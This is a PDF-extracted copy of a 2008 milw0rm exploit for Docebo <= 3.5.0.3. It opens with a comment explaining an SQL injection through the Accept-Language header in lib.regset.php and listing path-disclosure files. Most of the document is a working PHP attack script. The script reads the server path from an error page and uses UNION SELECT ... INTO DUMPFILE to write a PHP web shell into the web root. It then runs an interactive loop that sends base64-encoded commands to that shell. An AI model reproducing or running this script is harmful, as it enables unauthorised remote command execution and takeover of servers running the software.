Docebo 3.5.0.3 lib.regset.php Command Execution Exploit.pdf

Loading ...
Global Do...
News & Politics
1 <?
2
3 /*
4
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
5
Docebo <= 3.5.0.3 (lib.regset.php) Remote Command Execution Exploit
6
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
7
8
author...: EgiX
9
mail.....: n0b0d13s[at]gmail[dot]com
10
11
link.....: http://www.docebo.org/
12
details..: works with magic_quotes_gpc = off (if magic quotes affects also $_SERVER[] array)
13
14
[−] autoDetectRegion() function vulnerable to SQL injection in /doceboCore/lib/lib.regset.php
15
16
781.
function autoDetectRegion() {
17
782.
18
783.
if(!isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])) {
19
784.
$res=0;
20
785.
return $res;
21
786.
}
22
787.
$accept_language=$_SERVER["HTTP_ACCEPT_LANGUAGE"];
23
788.
// [TODO] move the code that makes the accept language array to lib.utils
24
789.
25
790.
$al_arr=explode(",", $accept_language);
26
791.
27
792.
$i=0;
28
793.
$res="";
29
794.
while(($res == "") && ($i < count($al_arr))) {
30
795.
31
796.
$bl_arr=explode(";", $al_arr[$i]);
32
797.
$browser_language=$bl_arr[0];
33
798.
34
799.
$qtxt="SELECT region_id FROM ".$this−>_getListTable()." WHERE browsercode LIKE ’%".$b
rowser_language."%’"; <==
35
800.
$q=$this−>_executeQuery($qtxt);
36
801.
37
802.
if (($q) && (mysql_num_rows($q) > 0)) {
38
803.
$row=mysql_fetch_array($q);
39
804.
$res=$row["region_id"];
40
805.
}
41
42
an attacker cuold be inject SQL code through http accept−language header (in the query at line 799), but expl
ode() function at
43
line 790 will split the injected code by comma (","), so isn’t possible even a blind SQL injection with BENCH
MARK() method...
44
this poc will try to inject some php code into docebo web directory by INTO DUMPFILE statement, this requires
 FILE privilege!
45
46
[−] Path disclosure at:
47
48
/doceboCore/class/class.conf_fw.php
Page 1/3
Docebo 3.5.0.3 lib.regset.php Command Execution Exploit
EgiX
01/09/2008
49
/doceboCore/class.module/class.event_manager.php
50
/doceboCore/lib/lib.domxml5.php
51
/doceboCore/menu/menu_over.php
52
/doceboCms/class/class.conf_cms.php
53
/doceboCms/lib/lib.compose.php
54
/doceboCms/modules/chat/teleskill.php
55
/doceboCms/class/class.admin_menu_cms.php
56 */
57
58 error_reporting(0);
59 set_time_limit(0);
60 ini_set("default_socket_timeout", 5);
61
62 function http_send($host, $packet)
63 {
64
$sock = fsockopen($host, 80);
65
while (!$sock)
66
{
67
print "\n[−] No response from {$host}:80 Trying again...\n";
68
$sock = fsockopen($host, 80);
69
}
70
fputs($sock, $packet);
71
while (!feof($sock)) $resp .= fread($sock, 1);
72
fclose($sock);
73
return $resp;
74 }
75
76 function get_path()
77 {
78
global $host, $path;
79
80
$packet = "GET {$path}../doceboCore/class/class.conf_fw.php HTTP/1.0\r\n";
81
$packet.= "Host: {$host}\r\n";
82
$packet.= "Connection: close\r\n\r\n";
83
84
preg_match("/in <b>(.*)<\/b> on/i", http_send($host, $packet), $found);
85
$ret = substr($found[1], 0, strlen($found[1]) − strlen(strstr($found[1], "docebo")));
86
$ret.= substr($path, 1);
87
88
return $ret;
89 }
90
91 print "\n+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+";
92 print "\n| Docebo <= 3.5.0.3 Remote Command Execution Exploit by EgiX |";
93 print "\n+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+\n";
94
95 if ($argc < 3)
96 {
97
print "\nUsage....: php $argv[0] host path\n";
98
print "\nhost.....: target server (ip/hostname)";
99
print "\npath.....: path to docebo directory\n";
100
print "\nExample..: php $argv[0] localhost /doceboCms/";
Page 2/3
Docebo 3.5.0.3 lib.regset.php Command Execution Exploit
EgiX
01/09/2008
101
print "\nExample..: php $argv[0] localhost /docebo/doceboLms/\n";
102
die();
103 }
104
105 $host = $argv[1];
106 $path = $argv[2];
107
108 $r_path = str_replace("\\", "/", get_path()); // replace "\" for windows path
109 $r_file = md5(time()).".php";
110
111 print "\n[−] Path disclosure: {$r_path}\n\n[−] Trying to inject php shell...\n";
112
113 $code
= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>";
114 $packet = "GET {$path} HTTP/1.0\r\n";
115 $packet.= "Host: {$host}\r\n";
116 $packet.= "Accept−Language: %’/**/AND/**/1=0/**/UNION/**/SELECT/**/’{$code}’/**/INTO/**/DUMPFILE/**/’{$r_path}{$r_file}’/*\r\n";
117 $packet.= "Connection: close\r\n\r\n";
118 $html
= http_send($host, $packet);
119
120 $packet = "GET {$path}{$r_file} HTTP/1.0\r\n";
121 $packet.= "Host: {$host}\r\n";
122 $packet.= "Connection: close\r\n\r\n";
123 $html
= http_send($host, $packet);
124
125 if (!ereg("_code_", $html)) die("\n[−] Exploit failed...\n");
126 else print "[−] Shell injected! Starting it...\n";
127
128 define(STDIN, fopen("php://stdin", "r"));
129 while(1)
130 {
131
print "\nxpl0it−sh3ll > ";
132
$cmd = trim(fgets(STDIN));
133
if ($cmd != "exit")
134
{
135
$packet  = "GET {$path}{$r_file} HTTP/1.0\r\n";
136
$packet .= "Host: {$host}\r\n";
137
$packet .= "Cmd: ".base64_encode($cmd)."\r\n";
138
$packet .= "Connection: close\r\n\r\n";
139
$html = http_send($host, $packet);
140
if (!ereg("_code_", $html)) die("\n[−] Exploit failed...\n");
141
$shell = explode("_code_", $html);
142
print "\n".$shell[1];
143
}
144
else break;
145 }
146
147 ?>
148
149 # milw0rm.com [2008−01−09]
Page 3/3
Docebo 3.5.0.3 lib.regset.php Command Execution Exploit
EgiX
01/09/2008